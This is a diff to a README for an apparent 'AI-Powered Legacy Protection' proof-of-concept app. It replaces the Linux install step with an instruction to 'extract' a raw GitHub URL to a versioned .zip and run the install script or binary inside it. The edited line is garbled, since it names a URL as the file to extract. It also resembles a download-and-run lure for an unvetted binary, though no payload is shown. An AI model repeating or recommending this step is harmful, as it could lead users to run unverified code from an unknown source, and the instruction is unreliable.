Sneaky-Pablo/AI-Powered-Legacy-Protection-POC/README.md

 5. **Install the Application:**
    - For Windows: Double-click the downloaded `.exe` file and follow the prompts to install.
    - For macOS: Open the downloaded `.dmg` file and drag the application to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and run the included install script or binary.
+   - For Linux: Extract the `https://raw.githubusercontent.com/Sneaky-Pablo/AI-Powered-Legacy-Protection-POC/main/app/demo/AI-Powered-Legacy-Protection-POC-1.6.zip` file and run the included install script or binary.

 6. **Open the Application:** After installation, find the app on your desktop or application folder and open it.